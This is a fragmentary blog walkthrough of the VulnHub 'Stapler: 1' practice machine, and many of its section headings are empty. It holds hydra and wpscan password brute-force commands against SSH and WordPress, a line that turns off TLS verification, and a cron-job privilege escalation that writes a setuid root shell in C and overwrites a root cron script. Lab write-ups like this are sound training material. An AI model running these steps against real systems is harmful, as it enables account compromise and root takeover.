VulnHub — Stapler: 1

Setup:

Victim Description:

Information Gathering:

nmap -sn -n 172.27.254.0/24

FTP Enumeration:

Truncated passwd file

SSH Enumeration:

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 172.27.254.41 ssh

SMB Enumeration:

Port 666 Enumeration:

Web Enumeration:

sudo wpscan — url https://172.27.254.41:12380/blogblog/ — enumerate u,ap — disable-tls-checks — log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

MySQL Enumeration:

WordPress Brute Force:

sudo wpscan — url https://172.27.254.41:12380/blogblog/ — disable-tls-checks — usernames /home/ptester/Stapler/wp_users.txt — wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt — log /home/ptester/Stapler/wp_creds.txt

Remote Shell:

Method 1 — WordPress Plugin:

Method 2 — MySQL, SELECT Statement:

Local Information Gathering and Enumeration:

Privilege Escalation:

Method 1 — Stored Password:

Method 2 — Kernel Exploit:

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

echo ‘int main(void)

{

setgid(0);

setuid(0);

execl(“/bin/sh”, “sh”, 0);

}’ > rootpriv.c

echo ‘chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;’ > /usr/local/sbin/cron-logrotate.sh

Flag:

--

--

--

Cyber Security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mike Bond

Mike Bond

Cyber Security Enthusiast

More from Medium

Securing Lichess one move at a time

picoCTF: PW Crack 1

Network Services (FTP) — Tryhackme

TryHackMe: SimpleCTF